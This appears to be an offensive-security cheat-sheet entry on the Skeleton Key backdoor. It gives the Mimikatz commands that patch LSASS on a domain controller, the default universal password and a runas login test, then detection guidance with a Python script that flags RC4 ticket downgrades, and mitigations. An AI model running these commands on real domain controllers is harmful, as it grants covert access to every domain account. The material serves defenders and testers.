Skeleton Key
A Skeleton Key is a stealthy backdoor attack in which Mimikatz patches LSASS memory on a Domain Controller. This lets an attacker authenticate as any domain user with a single master password, while each user's real password keeps working.
Overview
- Injects code into `lsass.exe` on a Domain Controller
- Leaves legitimate logins untouched
- Adds a universal password valid for all domain accounts
- Memory-resident: disappears on reboot
Prerequisites
- SYSTEM-level access on a Domain Controller
- Ability to execute code and patch LSASS memory
- Mimikatz or similar tool
Key Concepts
- LSASS: Local Security Authority Subsystem Service; handles authentication
- Patch: Modifies Kerberos/NTLM authentication providers in memory
- Backdoor password: An additional universal password accepted for all users
Mimikatz Commands
Load Skeleton Key Patch
```
mimikatz # privilege::debug
mimikatz # misc::skeleton
```
Default password: `mimikatz`
Once injected, any domain user can authenticate with either:
- Their real password
- The skeleton key password: `mimikatz`
Test Authentication
From any domain-joined machine:
```
runas /user:corp.local\jdoe cmd
```
Enter `mimikatz` at the password prompt.
A shell should open, authenticating as `jdoe`.
Limitations
- Only works with NTLM and Kerberos TGTs issued by the patched DC
- Only works while the DC is running (cleared on reboot)
- Does not persist unless reloaded or installed via persistent malware
Impact
- Full domain compromise
- Extremely stealthy – no password changes, no account creation
- Invisible to domain logs unless memory or behavior is being monitored
Detection
- Monitor LSASS for code injection or unsigned module loads
- Behavioral indicators:
  - Unusual NTLM/Kerberos logons without known credentials
  - Multiple users authenticating with the same password
- Defender for Identity, EDR products such as CrowdStrike, and Sysmon for `lsass.exe` memory anomalies
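One concrete Kerberos indicator, added here as an example that is not part of the original notes: the Skeleton Key patch only implements RC4-HMAC, so accounts that normally receive AES-encrypted TGTs start receiving RC4 ones. The script below runs that check over constructed Security event 4768 records (the field names `TargetUserName`, `IpAddress`, `TicketEncryptionType` and `Status` are the real 4768 fields; every value, account and `msDS-SupportedEncryptionTypes` entry is a made-up sample).

```python
from collections import Counter

# Kerberos etype code as logged in 4768's TicketEncryptionType field
RC4_HMAC = 0x17
# msDS-SupportedEncryptionTypes bits for the AES suites (per-account AD attribute)
AES128_FLAG = 0x08
AES256_FLAG = 0x10

# Constructed sample of 4768 (TGT requested) events, not real telemetry.
SAMPLE_4768 = [
    {"TargetUserName": "jdoe",     "IpAddress": "10.0.0.5",  "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "jdoe",     "IpAddress": "10.0.0.5",  "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "svc_sql",  "IpAddress": "10.0.0.20", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "legacy01", "IpAddress": "10.0.0.9",  "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "asmith",   "IpAddress": "10.0.0.7",  "TicketEncryptionType": "0x17", "Status": "0x18"},
]

# Constructed: msDS-SupportedEncryptionTypes per account, as exported from AD.
# 0x18 = AES128+AES256, 0x1C adds RC4, 0x04 = RC4 only (a genuinely legacy account).
SUPPORTED_ETYPES = {"jdoe": 0x18, "svc_sql": 0x1C, "legacy01": 0x04, "asmith": 0x18}


def supports_aes(flags):
    return bool(flags & (AES128_FLAG | AES256_FLAG))


def downgrade_alerts(events, supported):
    """Return (user, ip) for successful RC4 TGTs issued to AES-capable accounts.

    An RC4-only account getting RC4 is normal; an AES-capable account getting
    RC4 is the downgrade a Skeleton Key patch produces and deserves a look.
    """
    alerts = []
    for e in events:
        if e["Status"] != "0x0":
            continue  # a failed request says nothing about the key the DC used
        if int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        if not supports_aes(supported.get(e["TargetUserName"], 0)):
            continue
        alerts.append((e["TargetUserName"], e["IpAddress"]))
    return alerts


def rc4_share(events, supported):
    """Fraction of successful TGTs for AES-capable accounts that were RC4.

    Trend this per DC: a jump from near 0 towards 1 on one DC is a signal
    even when no single account looks unusual on its own.
    """
    counts = Counter()
    for e in events:
        if e["Status"] == "0x0" and supports_aes(supported.get(e["TargetUserName"], 0)):
            counts[int(e["TicketEncryptionType"], 16) == RC4_HMAC] += 1
    total = counts[True] + counts[False]
    return counts[True] / total if total else 0.0
```

Accounts that legitimately negotiate RC4 (the `legacy01` case) are excluded by the supported-etypes baseline, which is what keeps this from alerting on every old service account.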
Mitigation
- Reboot the DC (clears the patch)
- Run LSASS as a Protected Process Light (RunAsPPL) and enable Windows Defender Credential Guard
- Monitor with EDR
- Block admin rights to DCs and restrict RDP access
- Isolate and rebuild compromised DCs